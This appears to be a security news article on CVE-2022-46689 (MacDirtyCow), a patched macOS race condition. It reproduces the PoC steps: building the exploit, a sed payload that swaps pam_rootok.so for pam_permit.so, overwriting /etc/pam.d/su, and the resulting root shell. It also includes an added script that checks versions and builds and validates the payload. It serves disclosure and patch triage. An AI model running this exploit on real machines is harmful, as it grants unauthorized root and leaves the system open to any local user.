CVE-2022-46689 PoC Exploit Released for macOS Privilege Escalation Vulnerability
A security researcher has published details and proof-of-concept (PoC) code for a macOS vulnerability that could be exploited to get root and execute arbitrary code with kernel privileges.
The PoC exploit targets CVE-2022-46689, a race condition in the macOS kernel's virtual memory code. A local, unprivileged user who wins the race can write into a read-only, copy-on-write mapping of a file they are not allowed to modify, which is why the PoC is named MacDirtyCow after the Linux Dirty COW bug it resembles. Apple's advisory rates the worst case as arbitrary code execution with kernel privileges.
Tracked as CVE-2022-46689 (CVSS score of 8.4), the security defect was identified and reported by Ian Beer of Google Project Zero, with a patch available since the release of macOS Ventura 13.1 in December.
“An app may be able to execute arbitrary code with kernel privileges,” Apple wrote in its advisory. “A race condition was addressed with additional validation.”
Recently, Zhuowei, the author of the MacDirtyCowDemo repository, published PoC code for the flaw. Rather than running code in the kernel, the demo uses the write primitive to overwrite /etc/pam.d/su so that su grants a root shell without asking for a password.
How to get root on macOS 13.0.1 with CVE-2022-46689
On a macOS 13.0.1 / 12.6.1 (or below) machine, run:
git clone https://github.com/zhuowei/MacDirtyCowDemo.git
cd MacDirtyCowDemo
clang -o switcharoo vm_unaligned_copy_switch_race.c
# Build the payload: /etc/pam.d/su lists pam_rootok.so, which only succeeds when the caller is already root.
# Swapping it for pam_permit.so (same length, six bytes) makes that "sufficient" auth line succeed for everyone.
sed -e 's/rootok/permit/g' /etc/pam.d/su > overwrite_file.bin
# Race the kernel into writing the payload over the read-only mapping of /etc/pam.d/su
./switcharoo /etc/pam.d/su overwrite_file.bin
su
You should get:
Testing for 10 seconds…
RO mapping was modified
% su
sh-3.2#
If your system is fully patched (macOS 13.1 / 12.6.2), it should instead read:
Testing for 10 seconds…
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure
and running su should still ask for a password.
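Two checks a practitioner would want around this procedure, as an added shell example that is not part of the article or the MacDirtyCowDemo repository: a version gate that classifies the output of `sw_vers -productVersion` against the fixed releases the article names (13.1, 12.6.2, 11.7.2), and a payload builder that reproduces the sed substitution on a constructed sample of /etc/pam.d/su and confirms it keeps the byte length and removes every pam_rootok reference. The function names, the sample file content (modelled on the real file), and the assumptions that major versions newer than 13 carry the fix and that older, unsupported majors are "unknown" are mine, not the article's.

```sh
#!/bin/sh
# Added example: version gate and payload check for CVE-2022-46689.
# Not from the article or the MacDirtyCowDemo repo; function names are mine.

# field V N: Nth dot-separated component of version V, or 0 if absent.
field() {
    printf '%s\n' "$1" | awk -F. -v n="$2" '{ v = $n; if (v == "") v = 0; print v + 0 }'
}

# version_ge A B: succeed if dotted version A >= B (three fields, missing = 0).
version_ge() {
    n=1
    while [ "$n" -le 3 ]; do
        a=$(field "$1" "$n"); b=$(field "$2" "$n")
        if [ "$a" -gt "$b" ]; then return 0; fi
        if [ "$a" -lt "$b" ]; then return 1; fi
        n=$((n + 1))
    done
    return 0
}

# cve_2022_46689_status VERSION: print patched, vulnerable or unknown using the
# fixed releases named in the advisory text: 13.1, 12.6.2, 11.7.2.
# Assumption (mine): majors above 13 ship with the fix; majors below 11 were
# not patched and are reported as unknown.
cve_2022_46689_status() {
    ver=$1
    major=${ver%%.*}
    case "$major" in
        13) fixed=13.1 ;;
        12) fixed=12.6.2 ;;
        11) fixed=11.7.2 ;;
        *)
            if [ "$major" -gt 13 ] 2>/dev/null; then echo patched; else echo unknown; fi
            return 0 ;;
    esac
    if version_ge "$ver" "$fixed"; then echo patched; else echo vulnerable; fi
}

# Constructed sample modelled on macOS's /etc/pam.d/su; only the rootok line
# matters for the PoC.
SAMPLE_PAM_SU='# su: auth account password session
auth       sufficient     pam_rootok.so
auth       required       pam_opendirectory.so
account    required       pam_group.so no_warn group=admin,wheel ruser root_only fail_safe
account    required       pam_opendirectory.so no_check_shell
password   required       pam_opendirectory.so
session    required       pam_launchd.so'

# make_overwrite CONTENT: the substitution the article performs with sed.
# pam_rootok.so (succeed only when already root) becomes pam_permit.so
# (always succeed); both words are six bytes, so the payload is the same
# length as the original and overwrites it in place.
make_overwrite() {
    printf '%s\n' "$1" | sed -e 's/rootok/permit/g'
}

# payload_ok ORIGINAL PAYLOAD: succeed if the payload has the original's byte
# length, the "sufficient" auth line now names pam_permit.so, and no
# pam_rootok reference survives.
payload_ok() {
    orig_len=$(printf '%s\n' "$1" | wc -c | tr -d ' ')
    new_len=$(printf '%s\n' "$2" | wc -c | tr -d ' ')
    [ "$orig_len" -eq "$new_len" ] || return 1
    printf '%s\n' "$2" | grep -Eq '^auth[[:space:]]+sufficient[[:space:]]+pam_permit\.so' || return 1
    ! printf '%s\n' "$2" | grep -q 'pam_rootok' || return 1
    return 0
}

# Stand-alone run: classify this host if it is a Mac, and validate the payload.
if command -v sw_vers >/dev/null 2>&1; then
    echo "host: $(cve_2022_46689_status "$(sw_vers -productVersion)")"
fi
payload=$(make_overwrite "$SAMPLE_PAM_SU")
if payload_ok "$SAMPLE_PAM_SU" "$payload"; then echo "payload: ok"; else echo "payload: bad"; fi
```

The version gate is only a first-pass triage: it trusts the product version string, so a host that reports 13.1 is assumed to carry the fix. The payload check matters because the article's substitution happens to preserve length; a replacement of a different length would not map byte-for-byte onto the original file.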
Successful exploitation hands an attacker who already has a foothold on the machine full control of it, which opens the door to ransomware deployment, data theft and persistent backdoors, so users should apply the updates (macOS 13.1 / 12.6.2 / 11.7.2). If you run the PoC on a test machine, inspect /etc/pam.d/su afterwards and restore the pam_rootok.so line if the change persisted; otherwise every local account on that machine can su to root without a password.